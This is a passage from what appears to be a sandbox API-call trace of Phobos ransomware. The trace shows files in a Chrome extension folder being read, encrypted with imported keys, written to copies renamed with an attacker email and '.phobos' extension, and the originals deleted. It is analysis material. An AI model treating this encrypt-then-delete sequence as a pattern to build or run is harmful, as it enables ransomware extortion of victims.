data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0156.122] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0156.122] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.122] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xfc, lpOverlapped=0x0) returned 1 [0156.123] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0156.123] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0156.124] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0156.124] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.124] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0156.124] CryptDestroyKey (hKey=0xa32c68) returned 1 [0156.124] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0156.124] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0156.124] CloseHandle (hObject=0x134) returned 1 [0156.124] CloseHandle (hObject=0x130) returned 1 [0156.124] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png")) returned 1 [0156.125] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0156.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0156.125] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=160) returned 1 [0156.126] CloseHandle (hObject=0x130) returned 1 [0156.126] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png")) returned 0x2020 [0156.126] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0156.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0156.126] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.126] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0156.126] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0156.126] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.126] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xa0, lpOverlapped=0x0) returned 1 [0156.127] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0156.127] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0156.128] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0156.128] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.128] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0156.128] CryptDestroyKey (hKey=0xa32c68) returned 1 [0156.128] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0156.128] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0156.128] CloseHandle (hObject=0x130) returned 1 [0156.129] CloseHandle (hObject=0x134) returned 1 [0156.129] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png")) returned 1 [0156.129] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0156.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0156.130] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=166) returned 1 [0156.130] CloseHandle (hObject=0x134) returned 1 [0156.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png")) returned 0x2020 [0156.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0156.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0156.130] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.130] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0156.131] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0156.131] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.131] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xa6, lpOverlapped=0x0) returned 1 [0156.134] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0156.134] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0156.135] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0156.135] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.135] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0156.135] CryptDestroyKey (hKey=0xa32c68) returned 1 [0156.135] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0156.135] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0156.135] CloseHandle (hObject=0x134) returned 1 [0156.136] CloseHandle (hObject=0x130) returned 1 [0156.136] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png")) returned 1 [0156.137] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0156.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0156.137] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=160) returned 1 [0156.137] CloseHandle (hObject=0x130) returned 1 [0156.137] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png")) returned 0x2020 [0156.137] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0156.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0156.137] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.137] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0156.138] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0156.138] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.138] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xa0, lpOverlapped=0x0) returned 1 [0156.139] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0156.139] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0156.140] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0156.140] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.140] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0156.140] CryptDestroyKey (hKey=0xa32c68) returned 1 [0156.140] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0156.140] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0156.140] CloseHandle (hObject=0x130) returned 1 [0156.140] CloseHandle (hObject=0x134) returned 1 [0156.140] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png")) returned 1 [0156.141] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0156.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0156.142] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1322) returned 1 [0156.142] CloseHandle (hObject=0x134) returned 1 [0156.142] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json")) returned 0x2020 [0156.142] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0156.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0156.142] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.142] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0156.142] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0156.142] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.142] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x52a, lpOverlapped=0x0) returned 1 [0156.188] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x530, dwBufLen=0x530 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x530) returned 1 [0156.188] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x530, lpOverlapped=0x0) returned 1 [0156.188] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0156.189] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) 